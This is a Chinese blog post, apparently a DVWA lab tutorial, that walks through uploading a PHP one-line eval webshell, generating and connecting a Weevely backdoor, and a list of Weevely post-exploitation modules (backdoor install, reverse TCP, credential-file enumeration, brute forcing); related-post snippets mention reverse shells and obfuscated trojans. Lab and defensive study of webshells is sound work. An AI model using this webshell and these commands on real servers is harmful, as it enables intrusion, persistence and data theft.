使用Weevely工具上传一句话木马

最新推荐文章于 2024-06-17 17:04:50 发布
最新推荐文章于 2024-06-17 17:04:50 发布
阅读量600 收藏 2
点赞数 1
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66469999/article/details/134013707
版权

(1)查看渗透机和靶机的ip,

在渗透机使用ping指令查看连通性

(2)打开火狐输入靶机ip访问网页

使用默认账户admin默认密码password登录

点击DVWA Security 将安全级别设为low

在/root目录下生成一个shell.php文件,文件内容为<?php eval($_POST[‘hello’]);?>

选择File Upload页面点击浏览选择刚刚创建的木马文件

Windows使用网站安全狗

自定义路径扫描  找到DVWA-1.9

通过扫描结果发现shell.php一句话木马被检测到

kali使用weevely命令来启动工具

使用命令weevely generate hello /root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马

Windows重新扫描shell.php

使用命令weevely http://172.16.1.113/hackable/uploads/hello.php hello连接weevely木马

 

输入任意键回车后进入虚拟终端界面

使用命令:audit_phpconf 查看目标靶机服务器php的配置文件

使用:file_upload /root/hello.php backdoor.php上传本地文件到目标服务器上

使用命令:file_check来检查目标站点下文件的状态及参数信息(md5值,大小,权限等)

总结weevely常用模块:

                                    system.info                //收集系统信息文件

                                    file.rm                      //删除文件

                                    file.read                  //读文件

file.upload                //上传本地文件
file.check              //检查文件的权限和
file.enum                   //在本地词表的书面枚举远程文件
file.download         //下载远程二进制/ ASCII文件到本地SQL
sql.query              //执行SQL查询
sql.console           //启动SQL控制台
sql.dump            //获取SQL数据库转储
sql.summary         //获取SQL数据库中的表和列后门
backdoor.tcp                //TCP端口后门
backdoor.install        //安装后门
backdoor.reverse_tcp        //反弹枚举
audit.user_files        //在用户家中列举常见的机密文件
audit.user_web_files        //列举常见的Web文件
audit.etc_passwd        //枚举/etc/passwd查找
find.webdir        //查找可写的web目录
find.perm        //查找权限可读/写/可执行文件和目录
find.name        //按名称查找文件和目录
find.suidsgid        //查找SUID / SGID文件和目录暴破
bruteforce.sql                //暴力破解单一SQL用户
bruteforce.sql_users        //暴力破解SQL密码
bruteforce.ftp               // 暴力破解单一FTP用户
bruteforce.ftp_users        //暴力破解FTP密码

dT天蓝Tb
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于 python 实现的千倍速一句话木马密码爆破工具
07-05
一句话木马 【作品名称】:基于 python 实现的千倍速一句话木马密码爆破工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目...
一句话木马要点和防范注意事项
05-24
一句话木马要点和防范注意事项
Weevely——PHP木马文件生成
随缘......~|-_-|~
10-08 361
实战Webshell管理工具Weevely检测思路分析
最新发布
白帽黑客鹏哥的博客
06-17 912
第三步:Client通过解密函数utils.sting.sxor()、zlib.decompress()、base64.b64decode()对接收服务端响应的body字符串进行解密,并判断字符串是否和send()函数发送到服务端的“X”值相同,从而判断客户端与服务端是否能够成功建立通信。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
使用工具weevely上传一句话木马
单核CPU的小朋友的博客
04-22 2432
使用 Weevely 查看使用帮助: 生成一句话木马后门: Weevely generate password /tmp/backdoor.php 也不知道为什么,只有生成在/tmp目录下才有效,所以这里我就生成在/tmp目录下了。 这里我们上传到别的机器的web服务器上。 然后使用weevely直接切入: 拿到shell。 这里不是root权限,所以还要自己想办法提权到root权限。。 ...
weevely(自动生成shell(上传文件一句话))
m0_48907714的博客
03-03 2207
跟中国剑蚁差不多,但是这个生成的好像剑蚁不能用 12345就是shell密码 文件上传成功后进行连接 weevely url 密码 连接成功后进入服务器的cmd 成功 输入audit_phpchonf 查看位置信息 输入systeminfo 查看服务器信息 输入net_scan 扫描端口 输入net_proxy 作为靶机作为代理服务器 如果要作为代理服务器的话,需要再将火狐代理设置成127.0.0.1 8080(全部设置) 通过netstat -pantu 查看自己计算机和哪些服务器建立TCP和UDP
利用weevely生成php后门木马
qq_28147861的博客
01-18 3639
Weevely工具介绍 weevely 是一款具有高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能: (1)它有30多种可完成自动管理渗透后期任务的功能模块。这些模块能够:执行命令和浏览远程文件系统;检测常见的服务器配置问题;创造TCP shell和reverse shell;在被测主机上安装HTTP代理;利用目标主机进行端口扫描。 (2)使用HTTP Cook
weevely生成木马并反向shell连接msf
小刚的博客
05-13 3690
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
通过Web应用程序实现远程控制(使用weevely工具生成php恶意木马应用程序进行远程控制)
weixin_51227348的博客
03-26 902
通过Web应用程序实现远程控制(使用weevely工具生成php恶意木马应用程序进行远程控制)
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
php一句话cmdshell新型 (非一句话木马)
10-30
【PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
使用过程】weevely生成、上传、连接、执行…你一定行
03-31 6443
weevely傻子都会
DVWA笔记(5)--File Upload(文件上传)
xiaopan233的博客
02-11 736
file upload 文件上传的话,就是通过网站的上传页面,将后门文件上传上去。看起来似乎很简单,但是上传绕过的方式可谓各式各样,各种绕过姿势。主要的难点就在绕过上传。不过如果成功上传了,那权限维持就很容易了。 low 我们使用kali自带的菜刀weevely生成一个后门文php文件。简单介绍一下kali中的weevely的使用 生成后门文件: weevely generate ...
文件上传漏洞(一句话木马)-学习笔记
热门推荐
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
文件上传漏洞
paradise
02-27 117
绕过JS验证 修改前端代码 删除js代码,修改form <form enctype="multipart/form-data" method="post" action="http://127.0.0.1/upload/Pass-01/index.php"> 网页另存 burpsuite剔除响应JS 绕过MIME-Type验证 mime-type介绍:https...
Kali工具-webshell之weevely
liwangjin0116的专栏
03-29 714
kali中常用的webshell工具-weevely,可以对网站的文件上传漏洞进行测试。
ctf一句话木马上传
06-12
CTF(Capture The Flag)中的"一句话木马上传"通常是指在网络安全竞赛或渗透测试挑战中,一种常见的攻击手段,用于将恶意代码隐藏在看似正常的字符串中,然后通过HTTP或类似协议发送到服务器上执行。这句话木马通常利用服务端的文件上传功能,通过巧妙编码,让服务端在解码和执行上传文件时,执行预先设置好的恶意脚本。 具体步骤可能包括: 1. **编码技巧**:使用某种编码方法(如Base64、URL编码等),将木马代码转化为看起来像是普通文本的字符串。 2. **文件上传**:通过上传一个包含编码后的字符串的文件(比如.txt、.jpg等)到服务器,这个文件会被服务器自动解码处理。 3. **执行触发**:服务器在解码文件内容时,由于编码规则的设计,会将恶意代码当作普通命令来执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值